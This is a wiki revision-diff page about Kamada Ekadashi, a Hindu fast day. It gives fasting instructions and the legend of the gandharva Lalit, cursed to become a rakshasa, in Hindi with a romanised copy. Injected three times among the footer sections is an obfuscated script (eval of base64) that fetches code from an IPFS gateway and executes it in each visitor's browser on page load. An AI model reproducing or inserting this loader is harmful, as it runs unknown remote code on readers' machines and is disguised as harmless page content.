Difference between revisions of "कामदा एकादशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "बडा" to "बड़ा")
Line 3: Line 3:
 
इस एकादशी को 'कामदा एकादशी' कहते हैं। यह एकादशी चैत्र शुक्ल पक्ष में आती है। इस दिन भगवान वासुदेव का पूजन किया जाता है। व्रत के एक दिन पूर्व (दशमी की दोपहर) [[जौ]], [[गेहूं]] और [[मूंग]] आदि का एक बार भोजन करके भगवान का स्मरण करना दूसरे दिन अर्थात एकादशी को प्रात: स्नानादि से निवृत्त होकर व्रत का संकल्प करके भगवान की पूजा अर्चना करें। दिन-भर भजन-कीर्तन कर, रात्रि में भगवान की मूर्ति के समीप जागरण करना चाहिए। दूसरे दिन व्रत का पारण करना चाहिए। जो भक्त भक्तिपूर्वक इस व्रत को करता है उसकी समस्त मनोकामनाएं पूर्ण होती हैं तथा सभी पापों से छुटकारा मिलता है। इस व्रत में नमक नहीं खाया जाता है।
 
इस एकादशी को 'कामदा एकादशी' कहते हैं। यह एकादशी चैत्र शुक्ल पक्ष में आती है। इस दिन भगवान वासुदेव का पूजन किया जाता है। व्रत के एक दिन पूर्व (दशमी की दोपहर) [[जौ]], [[गेहूं]] और [[मूंग]] आदि का एक बार भोजन करके भगवान का स्मरण करना दूसरे दिन अर्थात एकादशी को प्रात: स्नानादि से निवृत्त होकर व्रत का संकल्प करके भगवान की पूजा अर्चना करें। दिन-भर भजन-कीर्तन कर, रात्रि में भगवान की मूर्ति के समीप जागरण करना चाहिए। दूसरे दिन व्रत का पारण करना चाहिए। जो भक्त भक्तिपूर्वक इस व्रत को करता है उसकी समस्त मनोकामनाएं पूर्ण होती हैं तथा सभी पापों से छुटकारा मिलता है। इस व्रत में नमक नहीं खाया जाता है।
 
==कथा==
 
==कथा==
प्राचीनकाल में भोगीपुर नगर में पुण्डरीक नामक एक राजा राज्य करता था। उनका दरबार किन्नरो व गंधर्वो से भरा रहता था, जो गायन और वादन में निपुण और योग्य थे। वहाँ किन्नर व गंधर्वों का गायन होता रहता था। एक दिन गन्धर्व ललित दरबार में गान कर रहा था कि अचानक उसे अपनी पत्नी की याद आ गई। इससे उसका स्वर, लय एवं ताल बिगडने लगे। इस त्रुटि को कर्कट नामक नाग ने जान लिया और यह बात राजा को बता दी। राजा को ललित पर बडा क्रोध आया। राजा ने ललित को राक्षस होने का श्राप दे दिया। ललित सहस्त्रों वर्ष तक राक्षस योनि में घूमता रहा। उसकी पत्नी भी उसी का अनुकरण करती रही। अपने पति को इस हालत में देखकर वह बडी दुःखी होती थी। एक दिन घुमते घुमते ललित की पत्नी ललिता विन्ध्य पर्वत पर रहने वाले ऋष्यमूक ऋषि के पास गई और अपने श्रापित पति के उद्धार का उपाय पूछने लगी। ऋषि को उन पर दया आ गई। उन्हने चैत्र शुक्ल पक्ष की 'कामदा एकादशी' व्रत करने का आदेश दिया। उनका आशीर्वाद लेकर गंधर्व पत्नी अपने स्थान पर लौट आई और उसने श्रद्धापूर्वक 'कामदा एकादशी' का व्रत किया। एकादशी व्रत के प्रभाव से इनका श्राप मिट गया। और अपने गन्धर्व स्वरूप को प्राप्त हो गए।   
+
प्राचीनकाल में भोगीपुर नगर में पुण्डरीक नामक एक राजा राज्य करता था। उनका दरबार किन्नरो व गंधर्वो से भरा रहता था, जो गायन और वादन में निपुण और योग्य थे। वहाँ किन्नर व गंधर्वों का गायन होता रहता था। एक दिन गन्धर्व ललित दरबार में गान कर रहा था कि अचानक उसे अपनी पत्नी की याद आ गई। इससे उसका स्वर, लय एवं ताल बिगडने लगे। इस त्रुटि को कर्कट नामक नाग ने जान लिया और यह बात राजा को बता दी। राजा को ललित पर बड़ा क्रोध आया। राजा ने ललित को राक्षस होने का श्राप दे दिया। ललित सहस्त्रों वर्ष तक राक्षस योनि में घूमता रहा। उसकी पत्नी भी उसी का अनुकरण करती रही। अपने पति को इस हालत में देखकर वह बडी दुःखी होती थी। एक दिन घुमते घुमते ललित की पत्नी ललिता विन्ध्य पर्वत पर रहने वाले ऋष्यमूक ऋषि के पास गई और अपने श्रापित पति के उद्धार का उपाय पूछने लगी। ऋषि को उन पर दया आ गई। उन्हने चैत्र शुक्ल पक्ष की 'कामदा एकादशी' व्रत करने का आदेश दिया। उनका आशीर्वाद लेकर गंधर्व पत्नी अपने स्थान पर लौट आई और उसने श्रद्धापूर्वक 'कामदा एकादशी' का व्रत किया। एकादशी व्रत के प्रभाव से इनका श्राप मिट गया। और अपने गन्धर्व स्वरूप को प्राप्त हो गए।   
  
  

Revision as of 16:23, 10 May 2011

vrat aur vidhi

is ekadashi ko 'kamada ekadashi' kahate haian. yah ekadashi chaitr shukl paksh mean ati hai. is din bhagavan vasudev ka poojan kiya jata hai. vrat ke ek din poorv (dashami ki dopahar) jau, gehooan aur mooang adi ka ek bar bhojan karake bhagavan ka smaran karana doosare din arthat ekadashi ko prat: snanadi se nivritt hokar vrat ka sankalp karake bhagavan ki pooja archana karean. din-bhar bhajan-kirtan kar, ratri mean bhagavan ki moorti ke samip jagaran karana chahie. doosare din vrat ka paran karana chahie. jo bhakt bhaktipoorvak is vrat ko karata hai usaki samast manokamanaean poorn hoti haian tatha sabhi papoan se chhutakara milata hai. is vrat mean namak nahian khaya jata hai.

katha

prachinakal mean bhogipur nagar mean pundarik namak ek raja rajy karata tha. unaka darabar kinnaro v gandharvo se bhara rahata tha, jo gayan aur vadan mean nipun aur yogy the. vahaan kinnar v gandharvoan ka gayan hota rahata tha. ek din gandharv lalit darabar mean gan kar raha tha ki achanak use apani patni ki yad a gee. isase usaka svar, lay evan tal bigadane lage. is truti ko karkat namak nag ne jan liya aur yah bat raja ko bata di. raja ko lalit par b da krodh aya. raja ne lalit ko rakshas hone ka shrap de diya. lalit sahastroan varsh tak rakshas yoni mean ghoomata raha. usaki patni bhi usi ka anukaran karati rahi. apane pati ko is halat mean dekhakar vah badi duahkhi hoti thi. ek din ghumate ghumate lalit ki patni lalita vindhy parvat par rahane vale rrishyamook rrishi ke pas gee aur apane shrapit pati ke uddhar ka upay poochhane lagi. rrishi ko un par daya a gee. unhane chaitr shukl paksh ki 'kamada ekadashi' vrat karane ka adesh diya. unaka ashirvad lekar gandharv patni apane sthan par laut aee aur usane shraddhapoorvak 'kamada ekadashi' ka vrat kiya. ekadashi vrat ke prabhav se inaka shrap mit gaya. aur apane gandharv svaroop ko prapt ho ge.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

kamada ekadashi

chaitr shukl (kamada) ekadashi vrat katha

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>